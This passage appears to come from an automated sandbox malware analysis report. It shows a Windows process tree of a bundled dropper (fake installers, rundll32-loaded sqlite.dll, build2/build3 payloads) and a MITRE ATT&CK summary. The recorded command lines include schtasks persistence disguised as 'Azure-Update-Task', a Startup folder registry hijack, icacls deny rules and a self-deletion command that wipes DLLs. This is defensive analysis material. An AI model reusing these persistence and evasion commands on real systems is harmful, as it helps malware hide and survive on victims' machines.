                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                          PID:6072
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7235398.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7235398.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:6136
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7820303.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7820303.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5980
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5336
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:2788
                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • Modifies registry class
                                                                                                                                PID:1032
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:6052
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:5492
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:5628
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-AQ4PR.tmp\MediaBurner2.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-AQ4PR.tmp\MediaBurner2.tmp" /SL5="$10398,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:5896
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-Q8EM9.tmp\3377047_logo_media.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-Q8EM9.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  PID:5276
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DPSZWFYVLW\ultramediaburner.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\DPSZWFYVLW\ultramediaburner.exe" /VERYSILENT
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5148
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-FGIR7.tmp\ultramediaburner.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-FGIR7.tmp\ultramediaburner.tmp" /SL5="$304AC,281924,62464,C:\Users\Admin\AppData\Local\Temp\DPSZWFYVLW\ultramediaburner.exe" /VERYSILENT
                                                                                                                                      4⤵
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      PID:7904
                                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                        5⤵
                                                                                                                                          PID:2608
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\05-290ee-779-3fb99-326c4b56f4254\Fyfuxajacae.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\05-290ee-779-3fb99-326c4b56f4254\Fyfuxajacae.exe"
                                                                                                                                      3⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      PID:6644
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9a-a0bf4-b3b-0b6ad-0357162760f32\Wumanojili.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\9a-a0bf4-b3b-0b6ad-0357162760f32\Wumanojili.exe"
                                                                                                                                      3⤵
                                                                                                                                        PID:7376
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zuyy5xt2.dzm\GcleanerEU.exe /eufive & exit
                                                                                                                                          4⤵
                                                                                                                                            PID:8260
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\zuyy5xt2.dzm\GcleanerEU.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\zuyy5xt2.dzm\GcleanerEU.exe /eufive
                                                                                                                                              5⤵
                                                                                                                                                PID:8940
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4ringgh.kvl\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                              4⤵
                                                                                                                                                PID:8380
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\q4ringgh.kvl\installer.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\q4ringgh.kvl\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:8960
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tpptfbec.nyb\ufgaa.exe & exit
                                                                                                                                                  4⤵
                                                                                                                                                    PID:8536
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ef5fh035.lxv\anyname.exe & exit
                                                                                                                                                    4⤵
                                                                                                                                                      PID:9076
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ef5fh035.lxv\anyname.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\ef5fh035.lxv\anyname.exe
                                                                                                                                                        5⤵
                                                                                                                                                          PID:496
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ef5fh035.lxv\anyname.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ef5fh035.lxv\anyname.exe" -q
                                                                                                                                                            6⤵
                                                                                                                                                              PID:8884
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wtnvle3s.le2\gcleaner.exe /mixfive & exit
                                                                                                                                                          4⤵
                                                                                                                                                            PID:8456
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\wtnvle3s.le2\gcleaner.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\wtnvle3s.le2\gcleaner.exe /mixfive
                                                                                                                                                              5⤵
                                                                                                                                                                PID:8920
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1uwljuu1.qjm\autosubplayer.exe /S & exit
                                                                                                                                                              4⤵
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:200
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-5P4O6.tmp\WEATHER Manager.tmp
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-5P4O6.tmp\WEATHER Manager.tmp" /SL5="$10314,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                        PID:5372
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-P4GTE.tmp\Setup.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-P4GTE.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                          2⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          PID:6068
                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-P4GTE.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-P4GTE.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289459 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:8048
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5436
                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                          1⤵
                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                          PID:6124
                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding EB08113C7DC8EC01257DB6342A297430 C
                                                                                                                                                            2⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:7368
                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding A652E65D6C4CD16D7B0B423AAD81DACD C
                                                                                                                                                            2⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:7184
                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding C5DACF44CA82B8503DF2C267E59E0CBB
                                                                                                                                                            2⤵
                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:7304
                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 8DE428AAB8070A9C5306DB3D3CD94600 C
                                                                                                                                                            2⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:6772
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            PID:10004
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                              3⤵
                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                              PID:6792
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:8624
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_C099.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:7644
                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:7708
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                2⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                PID:7744
                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                              1⤵
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:8700
                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                              PID:8836
                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:8416
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                2⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:6652
                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:8656
                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                              1⤵
                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              PID:7228
                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                              1⤵
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                              PID:6480
                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4caee095-7aab-284e-b48e-a83014c8835a}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                2⤵
                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                PID:8536
                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000198"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:9424
                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:9612
                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                  PID:9604
                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  PID:9264
                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                  PID:9064
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:9792
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\30D1.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\30D1.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:6484
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\30D1.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\30D1.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    PID:10040
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls "C:\Users\Admin\AppData\Local\a8a9c31c-6fb3-4955-baa4-2873140971d9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                      PID:1056
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\30D1.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\30D1.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:10156
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\30D1.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\30D1.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:10176
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\67d1abc5-7699-407b-a0ef-98712bc8c050\build2.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\67d1abc5-7699-407b-a0ef-98712bc8c050\build2.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:5688
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\67d1abc5-7699-407b-a0ef-98712bc8c050\build2.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\67d1abc5-7699-407b-a0ef-98712bc8c050\build2.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                              PID:8796
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\67d1abc5-7699-407b-a0ef-98712bc8c050\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:2272
                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                    taskkill /im build2.exe /f
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                    PID:8432
                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:9528
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\67d1abc5-7699-407b-a0ef-98712bc8c050\build3.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\67d1abc5-7699-407b-a0ef-98712bc8c050\build3.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              PID:9452
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\67d1abc5-7699-407b-a0ef-98712bc8c050\build3.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\67d1abc5-7699-407b-a0ef-98712bc8c050\build3.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:10148
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:8912
                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:6596
                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          PID:8780
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4823.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4823.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5152
                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            PID:6376
                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              PID:5920
                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:2000
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E483.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\E483.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            PID:9960
                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:8428
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\FEA4.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\FEA4.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:988
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:10096
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:9292
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:7988
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                        PID:7496
                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2348
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3891.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\3891.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      PID:1892

                                                                                                                                                                                    Network

                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                    Execution

                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                    1
                                                                                                                                                                                    T1053

                                                                                                                                                                                    Persistence

                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                    1
                                                                                                                                                                                    T1031

                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                    1
                                                                                                                                                                                    T1060

                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                    1
                                                                                                                                                                                    T1053

                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                    1
                                                                                                                                                                                    T1053

                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                    4
                                                                                                                                                                                    T1112

                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                    1
                                                                                                                                                                                    T1089

                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                    1
                                                                                                                                                                                    T1497

                                                                                                                                                                                    File Permissions Modification

                                                                                                                                                                                    1
                                                                                                                                                                                    T1222

                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                    1
                                                                                                                                                                                    T1130

                                                                                                                                                                                    Credential Access

                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                    3
                                                                                                                                                                                    T1081

                                                                                                                                                                                    Discovery

                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                    1
                                                                                                                                                                                    T1518

